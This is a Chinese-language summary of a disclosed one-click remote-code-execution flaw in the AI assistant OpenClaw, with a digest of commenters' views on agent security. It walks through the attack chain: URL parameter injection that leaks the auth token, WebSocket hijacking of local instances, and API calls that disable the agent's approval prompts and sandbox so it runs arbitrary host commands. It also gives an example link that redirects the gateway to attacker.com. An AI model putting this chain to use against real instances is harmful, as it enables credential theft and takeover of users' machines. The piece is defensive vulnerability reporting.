文章摘要
文章披露了一个严重的安全漏洞,攻击者只需一次点击即可远程执行代码,窃取Moltbot用户的数据和密钥。该漏洞由安全研究员Mav Levin发现,威胁程度高,可能导致敏感信息泄露。
文章总结
深度剖析:OpenClaw一键远程代码执行漏洞可窃取用户数据与密钥
2026年2月1日,安全研究团队depthfirst披露了开源AI助手OpenClaw(前身为Moltbot和ClawdBot)存在高危漏洞。该漏洞允许攻击者通过诱导用户点击恶意链接,实现远程代码执行(RCE),进而完全控制受害者的数字生活。
【漏洞发现过程】 研究团队通过自动化扫描发现三个关键环节存在逻辑缺陷: 1. 参数注入:app-settings.ts会无条件接受URL中的gatewayUrl参数并存储 2. 自动连接:app-lifecycle.ts在加载后会立即连接新设置的网关 3. 认证泄露:gateway.ts会将敏感的authToken自动包含在握手协议中
这三个看似无害的操作组合后,形成了"点击劫持→认证泄露"的攻击链。攻击者只需构造形如http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080的链接,就能窃取用户凭证。
【攻击升级】 原始漏洞存在三个局限: 1. 仅影响互联网暴露的实例 2. 无法绕过安全沙箱 3. 不能执行任意代码
研究人员通过以下方式突破了所有限制: - 利用WebSocket的origin验证缺陷,实现跨站WebSocket劫持(CSWSH),攻击本地实例 - 通过API调用禁用安全审批机制(exec.approvals.set) - 修改配置强制命令在宿主机执行(config.patch)
【完整攻击链】 1. 受害者访问恶意网页 2. JavaScript后台打开漏洞URL泄露authToken 3. 建立到localhost的WebSocket连接 4. 禁用安全审批和沙箱保护 5. 通过node.invoke执行任意系统命令
【修复情况】 OpenClaw团队已发布补丁(GitHub Advisory GHSA-g8p2-7wf7-98mq),主要修复措施包括: - 增加网关URL变更确认弹窗 - 移除自动连接行为 所有v2026.1.24-1之前的版本均受影响,建议用户立即升级并轮换凭证。
(注:已省略公司宣传、导航菜单等非核心内容,保留技术细节和漏洞时间线等关键信息)
评论总结
以下是评论内容的总结,平衡呈现不同观点并保留关键引用:
安全问题普遍存在
- 多位评论者认为AI代理产品存在严重安全隐患,特别是授权访问所有数据的设计理念。
- 引用:"Security is just out the window with these things" (ethin)
- 引用:"the entire personal AI agent product category is built on the premise of 'connect me to all your data + give me execution'" (vulnwrecker5000)
用户行为与风险意识
- 批评用户轻易交出敏感权限,尤其是不具备专业知识的群体。
- 引用:"So many people are giving keys to the kingdom to this thing" (bmit)
- 引用:"I'll bet many consumers wouldn't even think twice about just giving full access" (ejcho)
技术解决方案
- 部分评论提出沙盒隔离(如gVisor、nono.sh)和零信任架构作为应对措施。
- 引用:"we run the hosted platform in gVisor... treat every container as hostile by default" (clawsyndicate)
- 引用:"uses kernel-level security primitives... to create sandboxes" (decodebytes)
产品价值质疑
- 讨论目标用户群体与实际需求是否匹配,认为高风险人群可能收益有限。
- 引用:"people without a lot to lose... handing over the keys to your entire life" (overgard)
- 引用:"the people legitimately busy enough... could probably afford to hire an administrative assistant" (overgard)
行业反思
- 呼吁加强安全设计,认为当前趋势忽视了历史安全经验。
- 引用:"I'm shocked that more people aren't thinking about security" (nsm100)
- 引用:"It's like the last 50 years never happened" (ethin)
关键矛盾:AI代理的"全数据访问"核心功能与最小权限原则之间的根本冲突(vulnwrecker5000提出)。